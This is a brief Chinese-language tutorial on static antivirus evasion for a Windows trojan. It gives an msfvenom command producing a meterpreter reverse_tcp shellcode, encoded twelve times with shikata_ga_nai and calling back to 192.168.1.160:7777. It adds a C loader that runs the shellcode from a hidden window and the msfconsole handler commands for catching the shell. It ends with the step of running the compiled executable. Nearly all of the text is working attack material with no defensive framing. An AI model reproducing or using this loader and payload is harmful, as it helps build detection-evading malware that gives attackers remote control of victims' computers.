1.静态免杀
1.1编译c文件,静态免杀
1.1.1 生成shellcode
在kali命令行输入
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c -o /home/shell/test01.c
-p 选择payload
-e 选择使用的编码
-i 给payload编码的次数
-b 避免出现的字符
-f 输出文件类型
-o 输出文件目录
1.1.2 对shellcode手工编译免杀
#include<stdio.h>
#include<windows.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char buf[] = 这里添加shellcode;
main()
{
__asm
{
lea eax,buf;
call eax;
}
}
改好shellcode后用c编译器编译
1.1.3开启监听
在kali上使用msf监听
在kali命令行输入
msfconsole
use exploit/multi/handler
set lhost 192.168.1.160
set lport 7777
set payload windows/meterpreter/reverse_tcp
exploit
1.1.4触发木马
运行编译好的exe文件